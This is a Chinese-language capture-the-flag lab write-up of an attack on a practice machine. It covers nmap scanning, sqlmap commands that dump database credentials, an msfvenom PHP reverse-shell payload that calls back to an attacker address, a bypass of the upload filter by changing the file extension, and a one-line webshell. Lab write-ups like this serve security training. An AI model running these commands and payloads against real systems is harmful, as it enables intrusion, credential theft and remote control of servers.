1. 程式人生 > 資料庫 >SQL注入-GET引數注入

SQL注入-GET引數注入

CTF練習

第一次CTF練習

1.拿到虛擬機器後開啟
一開始想用外部Xshell連線它,被老馮罵了一頓

2.開啟kali用nmap掃描該機器
nmap 192.168.80.135
發現該機器開啟了22和80埠
說明該機器開啟了ssh和http服務

3.瀏覽器檢視該機器的http服務
http://192.168.80.135
發現網站,有四個頁面,前三個是展示介面,第四個是登入介面
嘗試登入

4.用burpsuite抓包
嘗試進行使用者名稱和密碼爆破,失敗
失敗原因:密碼字典不夠強大(後面檢視發現只有8位數字和六位密碼,需要擴充自己的密碼本)

5.用owasp掃描網站
發現SQL注入的漏洞,將url複製(後面的引數不用複製)

6.用sqlmap進行sql注入
sqlmap -u “複製的url”–dbs 查詢資料庫
-D “db_name”–tables 查詢資料庫db_name的所有表
-T “AA” --columns查詢表AA的所有欄位
-C “BB”–dump 查詢BB列的資料
其中有好幾個“y”,使用sqlmap的預設字典進行破解
成功。進入資料庫,提取到使用者名稱admin和密碼p4ssw0rd
使用使用者名稱和密碼登入第四個介面
發現可以上傳檔案

7.使用msfvenom生成小馬
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.80.129 lport=8899 -f raw

預設埠是4444,不寫埠的話後面監聽的就是4444埠
raw就是直接生成語句,在終端直接顯示,不用放到任何檔案中
新建test.php檔案並將語句貼上進去,上傳
網頁顯示:“NO PHP!”將字尾改為PHP,再次上傳成功

8.開啟msfconsole
使用payload:exploit/multi/handler監聽129的8899埠得到回連的session
成功拿到shell

9.用一句話木馬,上傳一句話木馬檔案,使用菜刀連線後可對135上的檔案進行增刪改查